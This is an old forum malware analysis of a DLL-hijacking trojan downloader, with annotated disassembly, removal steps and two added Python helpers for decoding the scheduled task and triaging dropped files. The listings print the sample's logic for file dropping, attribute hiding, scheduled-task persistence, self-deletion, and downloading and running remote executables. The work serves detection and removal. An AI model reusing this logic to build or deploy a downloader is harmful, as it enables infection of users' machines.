zzage
Posted on 2008-12-1 17:09
【Title】Analysis of a simple DLL-hijacking downloader
【Author】ZzAge[LCG]
【Target】A certain downloader
【Tools】IDA, OllyDbg
【Author QQ】85400516
【Author e-mail】zzage@163.com
【Author homepage】http://hi.baidu.com/zzage
【Date】1 December 2008
1. Create the mutex
CODE:00404844 push ebx
CODE:00404845 push offset Name ; lpName //'exe'
CODE:0040484A push 0FFFFFFFFh ; int
CODE:0040484C push 0 ; lpMutexAttributes
CODE:0040484E call sub_403EC4 // mutex creation routine
CODE:00404853 call GetLastError_0
CODE:00404858 cmp eax, 0B7h ; 0B7h = ERROR_ALREADY_EXISTS
CODE:0040485D jnz short loc_404861
CODE:0040485F mov bl, 1
CODE:00404861
CODE:00404861 loc_404861: ; CODE XREF: sub_404844+19j
CODE:00404861 mov eax, ebx
CODE:00404863 pop ebx
CODE:00404864 retn
2. Get the Windows directory
CODE:004041DB push 100h ; uSize
CODE:004041E0 push ebx ; lpBuffer
CODE:004041E1 call GetWindowsDirectoryA
3. Delete the scheduled-task file C:\WINDOWS\Tasks\At1.job
CODE:004041FD mov edx, offset dword_404530 //'\tasks\at1.job'
CODE:00404202 call sub_403760
CODE:00404207 mov eax, [ebp+var_4]
CODE:0040420A call sub_403840
CODE:0040420F push eax ; lpFileName
CODE:00404210 call DeleteFileA
4. Set the attributes of wsock32x.dll, lpk.dll and avp.exe in the Windows directory back to normal and delete them, then copy the trojan itself into the Windows directory under the new name avp.exe.
CODE:0040422C mov edx, offset dword_404548//'\wsock32x.dll'
CODE:00404231 call sub_403760
CODE:00404236 mov eax, [ebp+var_8]
CODE:00404239 call sub_403840
CODE:0040423E push eax ; lpFileName
CODE:0040423F call SetFileAttributesA
CODE:00404244 push 80h ; dwFileAttributes = FILE_ATTRIBUTE_NORMAL
CODE:00404249 lea eax, [ebp+var_C]
CODE:0040424C mov edx, ebx
CODE:0040424E mov ecx, 101h
CODE:00404253 call sub_403740
CODE:00404258 lea eax, [ebp+var_C]
CODE:0040425B mov edx, offset dword_404560 //'\lpk.dll'
CODE:00404260 call sub_403760
CODE:00404265 mov eax, [ebp+var_C]
CODE:00404268 call sub_403840
CODE:0040426D push eax ; lpFileName
CODE:0040426E call SetFileAttributesA
CODE:00404273 push 80h ; dwFileAttributes
CODE:00404278 lea eax, [ebp+var_10]
CODE:0040427B mov edx, ebx
CODE:0040427D mov ecx, 101h
CODE:00404282 call sub_403740
CODE:00404287 lea eax, [ebp+var_10]
CODE:0040428A mov edx, offset dword_404574 //'\avp.exe'
CODE:0040428F call sub_403760
CODE:00404294 mov eax, [ebp+var_10]
CODE:00404297 call sub_403840
CODE:0040429C push eax ; lpFileName
CODE:0040429D call SetFileAttributesA
CODE:004042A2 lea eax, [ebp+var_14]
CODE:004042A5 mov edx, ebx
CODE:004042A7 mov ecx, 101h
CODE:004042AC call sub_403740
CODE:004042B1 lea eax, [ebp+var_14]
CODE:004042B4 mov edx, offset dword_404548 //'\wsock32x.dll'
CODE:004042B9 call sub_403760
CODE:004042BE mov eax, [ebp+var_14]
CODE:004042C1 call sub_403840
CODE:004042C6 push eax ; lpFileName
CODE:004042C7 call DeleteFileA
CODE:004042CC lea eax, [ebp+var_18]
CODE:004042CF mov edx, ebx
CODE:004042D1 mov ecx, 101h
CODE:004042D6 call sub_403740
CODE:004042DB lea eax, [ebp+var_18]
CODE:004042DE mov edx, offset dword_404560 //'\lpk.dll'
CODE:004042E3 call sub_403760
CODE:004042E8 mov eax, [ebp+var_18]
CODE:004042EB call sub_403840
CODE:004042F0 push eax ; lpFileName
CODE:004042F1 call DeleteFileA
CODE:004042F6 lea eax, [ebp+var_1C]
CODE:004042F9 mov edx, ebx
CODE:004042FB mov ecx, 101h
CODE:00404300 call sub_403740
CODE:00404305 lea eax, [ebp+var_1C]
CODE:00404308 mov edx, offset dword_404574 //'\avp.exe'
CODE:0040430D call sub_403760
CODE:00404312 mov eax, [ebp+var_1C]
CODE:00404315 call sub_403840
CODE:0040431A push eax ; lpFileName
CODE:0040431B call DeleteFileA
CODE:00404320 push 0 ; bFailIfExists
CODE:00404322 lea eax, [ebp+var_20]
CODE:00404325 mov edx, ebx
CODE:00404327 mov ecx, 101h
CODE:0040432C call sub_403740
CODE:00404331 lea eax, [ebp+var_20]
CODE:00404334 mov edx, offset dword_404574 //'\avp.exe'
CODE:00404339 call sub_403760
CODE:0040433E mov eax, [ebp+var_20]
CODE:00404341 call sub_403840
CODE:00404346 push eax ; lpNewFileName
CODE:00404347 lea edx, [ebp+var_24]
CODE:0040434A xor eax, eax
CODE:0040434C call sub_4026F0
CODE:00404351 mov eax, [ebp+var_24]
CODE:00404354 call sub_403840
CODE:00404359 push eax ; lpExistingFileName
CODE:0040435A call CopyFileA
5. Drop lpk.dll and wsock32x.dll into the Windows directory
CODE:00404371 mov edx, offset dword_404560;"\lpk.dll"
CODE:00404376 call sub_403760
CODE:0040437B mov ecx, [ebp+var_28]
CODE:0040437E mov edx, offset dword_404588;"LPK"
CODE:00404383 mov eax, offset aExefile ; "exefile"
CODE:00404388 call sub_4040A8 // resource extraction routine
CODE:0040438D lea eax, [ebp+var_2C]
CODE:00404390 mov edx, ebx
CODE:00404392 mov ecx, 101h
CODE:00404397 call sub_403740
CODE:0040439C lea eax, [ebp+var_2C]
CODE:0040439F mov edx, offset dword_404548;"wsock32x.dll"
CODE:004043A4 call sub_403760
CODE:004043A9 mov ecx, [ebp+var_2C]
CODE:004043AC mov edx, offset aWsock32x ; "wsock32x"
CODE:004043B1 mov eax, offset aExefile ; "exefile"
CODE:004043B6 call sub_4040A8 // resource extraction routine
6. Copy cmd.exe from the system32 directory into the Windows directory as svchost.exe, set the attributes of svchost.exe, avp.exe, wsock32x.dll and lpk.dll to read-only, hidden and system, then run svchost.exe
CODE:004043BB push 0 ; bFailIfExists
CODE:004043BD lea eax, [ebp+var_30]
CODE:004043C0 mov edx, ebx
CODE:004043C2 mov ecx, 101h
CODE:004043C7 call sub_403740
CODE:004043CC lea eax, [ebp+var_30]
CODE:004043CF mov edx, offset dword_4045B8 ;"\svchost.exe"
CODE:004043D4 call sub_403760
CODE:004043D9 mov eax, [ebp+var_30]
CODE:004043DC call sub_403840
CODE:004043E1 push eax ; lpNewFileName
CODE:004043E2 lea eax, [ebp+var_34]
CODE:004043E5 mov edx, ebx
CODE:004043E7 mov ecx, 101h
CODE:004043EC call sub_403740
CODE:004043F1 lea eax, [ebp+var_34]
CODE:004043F4 mov edx, offset aSystem32Cmd_ex ; "\\system32\\cmd.exe"
CODE:004043F9 call sub_403760
CODE:004043FE mov eax, [ebp+var_34]
CODE:00404401 call sub_403840
CODE:00404406 push eax ; lpExistingFileName
CODE:00404407 call CopyFileA
CODE:0040440C push 23h ; dwFileAttributes = READONLY | HIDDEN | ARCHIVE
CODE:0040440E lea eax, [ebp+var_38]
CODE:00404411 mov edx, ebx
CODE:00404413 mov ecx, 101h
CODE:00404418 call sub_403740
CODE:0040441D lea eax, [ebp+var_38]
CODE:00404420 mov edx, offset dword_4045B8 ;"\svchost.exe"
CODE:00404425 call sub_403760
CODE:0040442A mov eax, [ebp+var_38]
CODE:0040442D call sub_403840
CODE:00404432 push eax ; lpFileName
CODE:00404433 call SetFileAttributesA
CODE:00404438 push 23h ; dwFileAttributes
CODE:0040443A lea eax, [ebp+var_3C]
CODE:0040443D mov edx, ebx
CODE:0040443F mov ecx, 101h
CODE:00404444 call sub_403740
CODE:00404449 lea eax, [ebp+var_3C]
CODE:0040444C mov edx, offset dword_404574;"\avp.exe"
CODE:00404451 call sub_403760
CODE:00404456 mov eax, [ebp+var_3C]
CODE:00404459 call sub_403840
CODE:0040445E push eax ; lpFileName
CODE:0040445F call SetFileAttributesA
CODE:00404464 push 23h ; dwFileAttributes
CODE:00404466 lea eax, [ebp+var_40]
CODE:00404469 mov edx, ebx
CODE:0040446B mov ecx, 101h
CODE:00404470 call sub_403740
CODE:00404475 lea eax, [ebp+var_40]
CODE:00404478 mov edx, offset dword_404548;"\wsock32x.dll"
CODE:0040447D call sub_403760
CODE:00404482 mov eax, [ebp+var_40]
CODE:00404485 call sub_403840
CODE:0040448A push eax ; lpFileName
CODE:0040448B call SetFileAttributesA
CODE:00404490 push 23h ; dwFileAttributes
CODE:00404492 lea eax, [ebp+var_44]
CODE:00404495 mov edx, ebx
CODE:00404497 mov ecx, 101h
CODE:0040449C call sub_403740
CODE:004044A1 lea eax, [ebp+var_44]
CODE:004044A4 mov edx, offset dword_404560;"\lpk.dll"
CODE:004044A9 call sub_403760
CODE:004044AE mov eax, [ebp+var_44]
CODE:004044B1 call sub_403840
CODE:004044B6 push eax ; lpFileName
CODE:004044B7 call SetFileAttributesA
CODE:004044BC push 0 ; uCmdShow
CODE:004044BE lea eax, [ebp+var_48]
CODE:004044C1 mov edx, ebx
CODE:004044C3 mov ecx, 101h
CODE:004044C8 call sub_403740
CODE:004044CD lea eax, [ebp+var_48]
CODE:004044D0 mov edx, offset dword_4045B8;"\svchost.exe"
CODE:004044D5 call sub_403760
CODE:004044DA mov eax, [ebp+var_48]
CODE:004044DD call sub_403840
CODE:004044E2 push eax ; lpCmdLine
CODE:004044E3 call WinExec
7. Add a scheduled task for the avp.exe trojan file so that the trojan runs at the specified time
CODE:00403F84 push ebp
CODE:00403F85 mov ebp, esp
CODE:00403F87 add esp, 0FFFFFEF0h
CODE:00403F8D push ebx
CODE:00403F8E push esi
CODE:00403F8F xor eax, eax
CODE:00403F91 mov [ebp+var_110], eax
CODE:00403F97 mov [ebp+var_8], eax
CODE:00403F9A xor eax, eax
CODE:00403F9C push ebp
CODE:00403F9D push offset loc_404048
CODE:00403FA2 push dword ptr fs:[eax]
CODE:00403FA5 mov fs:[eax], esp
CODE:00403FA8 push 100h ; uSize
CODE:00403FAD lea eax, [ebp+Buffer]
CODE:00403FB3 push eax ; lpBuffer
CODE:00403FB4 call GetWindowsDirectoryA
CODE:00403FB9 lea eax, [ebp+var_8]
CODE:00403FBC lea edx, [ebp+Buffer]
CODE:00403FC2 mov ecx, 101h
CODE:00403FC7 call sub_4039D0
CODE:00403FCC mov eax, 10h
CODE:00403FD1 call sub_4024A0
CODE:00403FD6 mov esi, eax
CODE:00403FD8 mov eax, 4
CODE:00403FDD call sub_4024A0
CODE:00403FE2 mov [ebp+JobId], eax
CODE:00403FE5 mov dword ptr [esi], 9
CODE:00403FEB xor eax, eax
CODE:00403FED mov [esi+4], eax
CODE:00403FF0 mov byte ptr [esi+8], 0
CODE:00403FF4 lea eax, [ebp+var_110]
CODE:00403FFA mov ecx, offset aAvp_exe ; "\\avp.exe"
CODE:00403FFF mov edx, [ebp+var_8]
CODE:00404002 call sub_403A04
CODE:00404007 mov eax, [ebp+var_110]
CODE:0040400D call sub_4039E8
CODE:00404012 mov [esi+0Ch], eax
CODE:00404015 mov byte ptr [esi+9], 1
CODE:00404019 lea eax, [ebp+JobId]
CODE:0040401C push eax ; JobId
CODE:0040401D push esi ; Buffer
CODE:0040401E push 0 ; Servername
CODE:00404020 call NetScheduleJobAdd
CODE:00404025 test eax, eax
CODE:00404027 xor eax, eax
CODE:00404029 pop edx
CODE:0040402A pop ecx
CODE:0040402B pop ecx
CODE:0040402C mov fs:[eax], edx
CODE:0040402F push offset loc_40404F
CODE:00404034
CODE:00404034 loc_404034: ; CODE XREF: sub_403F84+C9j
CODE:00404034 lea eax, [ebp+var_110]
CODE:0040403A call sub_403908
CODE:0040403F lea eax, [ebp+var_8]
CODE:00404042 call sub_403908
CODE:00404047 retn
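To check what the NetScheduleJobAdd call above actually registers, here is an added decoder (not code from the post) for the 32-bit AT_INFO structure, driven by a constructed memory snapshot that reproduces the field writes in the listing ([esi]=9, [esi+4]=0, [esi+8]=0, [esi+9]=1, [esi+0Ch]=command pointer); the base address and the Windows directory used in the snapshot are assumptions.

```python
import struct

# 32-bit AT_INFO layout (netapi32 lmat.h): JobTime, DaysOfMonth, DaysOfWeek,
# Flags, 2 bytes padding, Command (pointer to a NUL-terminated wide string).
# These offsets match the writes in the listing: 0, 4, 8, 9 and 0Ch.
AT_INFO_FMT = "<IIBBxxI"
AT_INFO_SIZE = struct.calcsize(AT_INFO_FMT)   # 16 bytes

JOB_FLAGS = {0x01: "JOB_RUN_PERIODICALLY", 0x02: "JOB_EXEC_ERROR",
             0x04: "JOB_RUNS_TODAY", 0x08: "JOB_ADD_CURRENT_DATE",
             0x10: "JOB_NONINTERACTIVE"}
WEEKDAYS = ("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun")   # bit 0 = Monday


def read_wstr(image, off):
    """Read a NUL-terminated UTF-16LE string starting at byte offset `off`."""
    end = off
    while end + 1 < len(image) and image[end:end + 2] != b"\x00\x00":
        end += 2
    return image[off:end].decode("utf-16-le")


def decode_at_info(image, base, struct_addr):
    """Decode the AT_INFO at virtual address `struct_addr` inside `image`,
    a bytes snapshot whose first byte lives at virtual address `base`."""
    off = struct_addr - base
    job_time, days_month, days_week, flags, cmd_ptr = struct.unpack_from(
        AT_INFO_FMT, image, off)
    # JobTime is milliseconds since midnight
    hh, rest = divmod(job_time, 3_600_000)
    mm, rest = divmod(rest, 60_000)
    ss, ms = divmod(rest, 1_000)
    return {
        "job_time": f"{hh:02d}:{mm:02d}:{ss:02d}.{ms:03d}",
        "days_of_month": [d + 1 for d in range(31) if days_month >> d & 1],
        "days_of_week": [WEEKDAYS[d] for d in range(7) if days_week >> d & 1],
        "flags": [name for bit, name in JOB_FLAGS.items() if flags & bit],
        "command": read_wstr(image, cmd_ptr - base),
    }


def build_sample_image(base=0x00980000, windir="C:\\WINDOWS"):
    """Constructed snapshot: the AT_INFO as the listing fills it, immediately
    followed by the wide-string command '<windir>\\avp.exe' it points at."""
    cmd_ptr = base + AT_INFO_SIZE
    header = struct.pack(AT_INFO_FMT, 9, 0, 0, 1, cmd_ptr)
    command = (windir + "\\avp.exe").encode("utf-16-le") + b"\x00\x00"
    return header + command


if __name__ == "__main__":
    snapshot = build_sample_image()
    print(decode_at_info(snapshot, 0x00980000, 0x00980000))
```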
8. Create a batch file, run it via CreateProcessA, and delete itself! That is the whole flow of the trojan's EXE; fairly simple~
CODE:004045E4 push ebp
CODE:004045E5 mov ebp, esp
CODE:004045E7 add esp, 0FFFFFDCCh
CODE:004045ED xor edx, edx
CODE:004045EF mov [ebp+var_230], edx
CODE:004045F5 mov [ebp+var_234], edx
CODE:004045FB mov [ebp+var_228], edx
CODE:00404601 mov [ebp+var_22C], edx
CODE:00404607 mov [ebp+var_4], edx
CODE:0040460A xor eax, eax
CODE:0040460C push ebp
CODE:0040460D push offset loc_4047BD
CODE:00404612 push dword ptr fs:[eax]
CODE:00404615 mov fs:[eax], esp
CODE:00404618 nop
CODE:00404619 nop
CODE:0040461A nop
CODE:0040461B nop
CODE:0040461C nop
CODE:0040461D push eax
CODE:0040461E pop eax
CODE:0040461F nop
CODE:00404620 lea eax, [ebp+var_4]
CODE:00404623 mov edx, offset aCDeleteme_bat ; "c:\\Deleteme.bat"
CODE:00404628 call sub_40369C
CODE:0040462D mov edx, [ebp+var_4]
CODE:00404630 lea eax, [ebp+var_1D0]
CODE:00404636 call sub_402A0C
CODE:0040463B lea eax, [ebp+var_1D0]
CODE:00404641 call sub_4027A8
CODE:00404646 call sub_402594
CODE:0040464B mov edx, offset dword_4047E8
CODE:00404650 lea eax, [ebp+var_1D0]
CODE:00404656 call sub_4038B0
CODE:0040465B call sub_402D28
CODE:00404660 call sub_402594
CODE:00404665 push offset dword_4047F8
CODE:0040466A lea edx, [ebp+var_22C]
CODE:00404670 xor eax, eax
CODE:00404672 call sub_4026F0
CODE:00404677 push [ebp+var_22C]
CODE:0040467D push offset dword_404808
CODE:00404682 lea eax, [ebp+var_228]
CODE:00404688 mov edx, 3
CODE:0040468D call sub_4037A4
CODE:00404692 mov edx, [ebp+var_228]
CODE:00404698 lea eax, [ebp+var_1D0]
CODE:0040469E call sub_4038B0
CODE:004046A3 call sub_402D28
CODE:004046A8 call sub_402594
CODE:004046AD push offset dword_404814
CODE:004046B2 lea edx, [ebp+var_234]
CODE:004046B8 xor eax, eax
CODE:004046BA call sub_4026F0
CODE:004046BF push [ebp+var_234]
CODE:004046C5 push offset dword_404808
CODE:004046CA push offset dword_404828
CODE:004046CF lea eax, [ebp+var_230]
CODE:004046D5 mov edx, 4
CODE:004046DA call sub_4037A4
CODE:004046DF mov edx, [ebp+var_230]
CODE:004046E5 lea eax, [ebp+var_1D0]
CODE:004046EB call sub_4038B0
CODE:004046F0 call sub_402D28
CODE:004046F5 call sub_402594
CODE:004046FA mov edx, offset dword_40483C
CODE:004046FF lea eax, [ebp+var_1D0]
CODE:00404705 call sub_4038B0
CODE:0040470A call sub_402D28
CODE:0040470F call sub_402594
CODE:00404714 lea eax, [ebp+var_1D0]
CODE:0040471A call sub_402AC8
CODE:0040471F call sub_402594
CODE:00404724 lea eax, [ebp+StartupInfo]
CODE:0040472A xor ecx, ecx
CODE:0040472C mov edx, 44h
CODE:00404731 call sub_402B20
CODE:00404736 mov [ebp+StartupInfo.dwFlags], 1
CODE:00404740 mov [ebp+StartupInfo.wShowWindow], 0
CODE:00404749 lea eax, [ebp+ProcessInformation]
CODE:0040474F push eax ; lpProcessInformation
CODE:00404750 lea eax, [ebp+StartupInfo]
CODE:00404756 push eax ; lpStartupInfo
CODE:00404757 push 0 ; lpCurrentDirectory
CODE:00404759 push 0 ; lpEnvironment
CODE:0040475B push 40h ; dwCreationFlags
CODE:0040475D push 0 ; bInheritHandles
CODE:0040475F push 0 ; lpThreadAttributes
CODE:00404761 push 0 ; lpProcessAttributes
CODE:00404763 mov eax, [ebp+var_4]
CODE:00404766 call sub_403840
CODE:0040476B push eax ; lpCommandLine
CODE:0040476C push 0 ; lpApplicationName
CODE:0040476E call CreateProcessA
CODE:00404773 test eax, eax
CODE:00404775 jz short loc_40478F
CODE:00404777 mov eax, [ebp+ProcessInformation.hThread]
CODE:0040477D push eax ; hObject
CODE:0040477E call CloseHandle_0
CODE:00404783 mov eax, [ebp+ProcessInformation.hProcess]
CODE:00404789 push eax ; hObject
CODE:0040478A call CloseHandle_0
CODE:0040478F
CODE:0040478F loc_40478F: ; CODE XREF: sub_4045E4+191j
CODE:0040478F nop
CODE:00404790 nop
CODE:00404791 nop
CODE:00404792 nop
CODE:00404793 nop
CODE:00404794 push eax
CODE:00404795 pop eax
CODE:00404796 nop
CODE:00404797 xor eax, eax
CODE:00404799 pop edx
CODE:0040479A pop ecx
CODE:0040479B pop ecx
CODE:0040479C mov fs:[eax], edx
CODE:0040479F push offset loc_4047C4
CODE:004047A4
CODE:004047A4 loc_4047A4: ; CODE XREF: sub_4045E4+1DEj
CODE:004047A4 lea eax, [ebp+var_234]
CODE:004047AA mov edx, 4
CODE:004047AF call sub_403628
CODE:004047B4 lea eax, [ebp+var_4]
CODE:004047B7 call sub_403604
CODE:004047BC retn
Program flow of LPK.dll
1. Create a thread
.data:10001253 push esi
.data:10001254 jnz short loc_10001294
.data:10001256 push 0 ; lpThreadId
.data:10001258 push 0 ; dwCreationFlags
.data:1000125A push 0 ; lpParameter
.data:1000125C push offset StartAddress ; lpStartAddress
.data:10001261 push 0 ; dwStackSize
.data:10001263 push 0 ; lpThreadAttributes
.data:10001265 call CreateThread
.data:1000126B push [esp+4+hLibModule] ; hLibModule
.data:1000126F call DisableThreadLibraryCalls
2. Load wsock32x.dll
.data:1000123D push offset LibFileName ; "wsock32x.dll"
.data:10001242 call LoadLibraryA
.data:10001248 push 1
.data:1000124A pop eax
.data:1000124B retn 4
Program flow of wsock32x.dll
1. The download routine
003E841E . 55 push ebp
003E841F . 68 45863E00 push 003E8645
003E8424 . 64:FF30 push dword ptr fs:[eax]
003E8427 . 64:8920 mov dword ptr fs:[eax], esp
003E842A . 68 54863E00 push 003E8654 ; /urlmon.dll
003E842F . E8 C8C7FFFF call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
003E8434 . 6A 00 push 0
003E8436 . 6A 00 push 0
003E8438 . 8D95 24FEFFFF lea edx, dword ptr [ebp-1DC]
003E843E . B8 01000000 mov eax, 1
003E8443 . E8 60FFFFFF call 003E83A8 ; get the temp folder path
003E8448 . 8D85 24FEFFFF lea eax, dword ptr [ebp-1DC]
003E844E . BA 68863E00 mov edx, 003E8668 ; gk_drf.txt
003E8453 . E8 38BAFFFF call 003E3E90
003E8458 . 8B85 24FEFFFF mov eax, dword ptr [ebp-1DC]
003E845E . E8 FDBAFFFF call 003E3F60
003E8463 . 50 push eax
003E8464 . A1 A8923E00 mov eax, dword ptr [3E92A8]
003E8469 . 50 push eax
003E846A 6A 00 push 0
003E846C E8 EBFEFFFF call <jmp.&URLMON.URLDownloadToFileA> ; download the txt file from the remote server into the temp folder
003E8471 . 6A FF push -1 ; /Alertable = TRUE
003E8473 . 68 C8000000 push 0C8 ; |Timeout = 200. ms
003E8478 . E8 87C7FFFF call <jmp.&kernel32.SleepEx> ; \SleepEx
003E847D . 33C0 xor eax, eax
003E847F . 55 push ebp
003E8480 . 68 10863E00 push 003E8610
003E8485 . 64:FF30 push dword ptr fs:[eax]
003E8488 . 64:8920 mov dword ptr fs:[eax], esp
003E848B . 8D95 20FEFFFF lea edx, dword ptr [ebp-1E0]
003E8491 . B8 01000000 mov eax, 1
003E8496 . E8 0DFFFFFF call 003E83A8 ; get the temp folder path
003E849B . 8D85 20FEFFFF lea eax, dword ptr [ebp-1E0]
003E84A1 . BA 68863E00 mov edx, 003E8668 ; gk_drf.txt
003E84A6 . E8 E5B9FFFF call 003E3E90
003E84AB . 8B95 20FEFFFF mov edx, dword ptr [ebp-1E0]
003E84B1 . 8D85 28FEFFFF lea eax, dword ptr [ebp-1D8]
003E84B7 . E8 BCA4FFFF call 003E2978 ; start reading the download URLs from the downloaded txt file
003E84BC . 8D85 28FEFFFF lea eax, dword ptr [ebp-1D8]
003E84C2 . E8 4DA2FFFF call 003E2714
003E84C7 . E8 60A1FFFF call 003E262C
003E84CC . 33C0 xor eax, eax
003E84CE . 8945 FC mov dword ptr [ebp-4], eax
003E84D1 . E9 08010000 jmp 003E85DE
003E84D6 > FF45 FC inc dword ptr [ebp-4]
003E84D9 . 8D55 F4 lea edx, dword ptr [ebp-C]
003E84DC . 8D85 28FEFFFF lea eax, dword ptr [ebp-1D8]
003E84E2 . E8 31A7FFFF call 003E2C18
003E84E7 . 8D85 28FEFFFF lea eax, dword ptr [ebp-1D8]
003E84ED . E8 92A7FFFF call 003E2C84
003E84F2 . E8 35A1FFFF call 003E262C
003E84F7 . 8D45 F8 lea eax, dword ptr [ebp-8]
003E84FA . 8B55 F4 mov edx, dword ptr [ebp-C]
003E84FD . E8 9EB7FFFF call 003E3CA0
003E8502 . 33C0 xor eax, eax
003E8504 . 55 push ebp
003E8505 . 68 D4853E00 push 003E85D4
003E850A . 64:FF30 push dword ptr fs:[eax]
003E850D . 64:8920 mov dword ptr fs:[eax], esp
003E8510 . 6A 00 push 0
003E8512 . 6A 00 push 0
003E8514 . 8D95 18FEFFFF lea edx, dword ptr [ebp-1E8]
003E851A . B8 01000000 mov eax, 1
003E851F . E8 84FEFFFF call 003E83A8 ; get the temp folder path
003E8524 . FFB5 18FEFFFF push dword ptr [ebp-1E8]
003E852A . 8D95 14FEFFFF lea edx, dword ptr [ebp-1EC]
003E8530 . 8B45 FC mov eax, dword ptr [ebp-4]
003E8533 . E8 68D4FFFF call 003E59A0
003E8538 . FFB5 14FEFFFF push dword ptr [ebp-1EC]
003E853E . 68 7C863E00 push 003E867C ; .exe
003E8543 . 8D85 1CFEFFFF lea eax, dword ptr [ebp-1E4]
003E8549 . BA 03000000 mov edx, 3
003E854E . E8 81B9FFFF call 003E3ED4
003E8553 . 8B85 1CFEFFFF mov eax, dword ptr [ebp-1E4]
003E8559 . E8 02BAFFFF call 003E3F60
003E855E . 50 push eax
003E855F . 8B45 F8 mov eax, dword ptr [ebp-8]
003E8562 . E8 F9B9FFFF call 003E3F60
003E8567 . 50 push eax
003E8568 . 6A 00 push 0
003E856A . E8 EDFDFFFF call <jmp.&URLMON.URLDownloadToFileA> ; start downloading the trojan
003E856F . 6A FF push -1 ; /Alertable = TRUE
003E8571 . 6A 64 push 64 ; |Timeout = 100. ms
003E8573 . E8 8CC6FFFF call <jmp.&kernel32.SleepEx> ; \SleepEx
003E8578 . 6A 00 push 0
003E857A . 8D95 0CFEFFFF lea edx, dword ptr [ebp-1F4]
003E8580 . B8 01000000 mov eax, 1
003E8585 . E8 1EFEFFFF call 003E83A8
003E858A . FFB5 0CFEFFFF push dword ptr [ebp-1F4]
003E8590 . 8D95 08FEFFFF lea edx, dword ptr [ebp-1F8]
003E8596 . 8B45 FC mov eax, dword ptr [ebp-4]
003E8599 . E8 02D4FFFF call 003E59A0
003E859E . FFB5 08FEFFFF push dword ptr [ebp-1F8]
003E85A4 . 68 7C863E00 push 003E867C ; .exe
003E85A9 . 8D85 10FEFFFF lea eax, dword ptr [ebp-1F0]
003E85AF . BA 03000000 mov edx, 3
003E85B4 . E8 1BB9FFFF call 003E3ED4
003E85B9 . 8B85 10FEFFFF mov eax, dword ptr [ebp-1F0]
003E85BF . E8 9CB9FFFF call 003E3F60 ; run the downloaded trojan
003E85C4 . 50 push eax ; |CmdLine
003E85C5 . E8 4AC6FFFF call <jmp.&kernel32.WinExec> ; \WinExec
This downloader essentially runs a renamed, disguised cmd.exe, then uses lpk.dll, a DLL with special loading behaviour, for the hijack, which in turn loads wsock32x.dll, the DLL that does the downloading.
For a detailed explanation of DLL hijacking, see Haifeng's (海风) article 《神奇的马甲Dll》 (The Magical Disguise DLL), thread: http://www.unpack.cn/viewthread.php?tid=26167
Removal: delete the scheduled task and the wsock32x.dll, lpk.dll and avp.exe in the Windows directory, and that's it...
Just a simple downloader analysis, please don't throw bricks....
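The removal step can be turned into a triage check. This added script (not from the original post) walks a constructed file listing and flags the artifacts this analysis names, including the renamed cmd.exe and the batch file, and decodes the 23h attribute value, which is read-only, hidden and archive. It generalises the write-up slightly by flagging lpk.dll in any directory other than system32; all paths and attribute values in the listing are constructed.

```python
from pathlib import PureWindowsPath

# FILE_ATTRIBUTE_* bits as passed to SetFileAttributesA
ATTR_NAMES = {0x01: "READONLY", 0x02: "HIDDEN", 0x04: "SYSTEM",
              0x10: "DIRECTORY", 0x20: "ARCHIVE", 0x80: "NORMAL"}
# File names this sample places in the Windows directory (from the listing above)
DROPPED = {"lpk.dll", "wsock32x.dll", "avp.exe", "svchost.exe"}


def decode_attrs(value):
    """Map a dwFileAttributes value to names; 0x23 gives READONLY, HIDDEN, ARCHIVE."""
    return [name for bit, name in ATTR_NAMES.items() if value & bit]


def triage(entries, windir="C:\\WINDOWS"):
    """entries: iterable of (path, dwFileAttributes). Returns (path, reason) pairs.
    lpk.dll is flagged in any directory except system32, the placement the
    hijack relies on; the other checks are the artifacts named in the write-up."""
    win = PureWindowsPath(windir)          # PureWindowsPath compares case-insensitively
    sys32, tasks = win / "system32", win / "Tasks"
    findings = []
    for path, attrs in entries:
        p = PureWindowsPath(path)
        name, parent = p.name.lower(), p.parent
        if parent == win and name in DROPPED:
            reason = f"{name} in Windows directory, attrs={'|'.join(decode_attrs(attrs))}"
        elif name == "lpk.dll" and parent != sys32:
            reason = "lpk.dll outside system32: DLL hijack candidate"
        elif name == "wsock32x.dll":
            reason = "downloader DLL name used by this sample"
        elif parent == tasks and name == "at1.job":
            reason = "AT job that relaunches avp.exe"
        elif name == "deleteme.bat":
            reason = "self-delete batch file"
        elif name == "gk_drf.txt":
            reason = "URL list fetched by wsock32x.dll"
        else:
            continue
        findings.append((path, reason))
    return findings


# Constructed listing: (path, attribute DWORD) as a directory walk would return them
SAMPLE_LISTING = [
    ("C:\\WINDOWS\\system32\\lpk.dll", 0x20),       # legitimate copy, not flagged
    ("C:\\WINDOWS\\system32\\svchost.exe", 0x20),   # legitimate copy, not flagged
    ("C:\\WINDOWS\\lpk.dll", 0x23),
    ("C:\\WINDOWS\\wsock32x.dll", 0x23),
    ("C:\\WINDOWS\\avp.exe", 0x23),
    ("C:\\WINDOWS\\svchost.exe", 0x23),             # renamed cmd.exe
    ("C:\\WINDOWS\\Tasks\\At1.job", 0x20),
    ("C:\\Deleteme.bat", 0x20),
    ("C:\\Program Files\\SomeApp\\lpk.dll", 0x20),  # hijack placement elsewhere
    ("C:\\WINDOWS\\notepad.exe", 0x20),
]

if __name__ == "__main__":
    for path, reason in triage(SAMPLE_LISTING):
        print(f"{path:40} {reason}")
```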
-------------From:ZzAge[LCG] {www.52pojie.cn}-------------------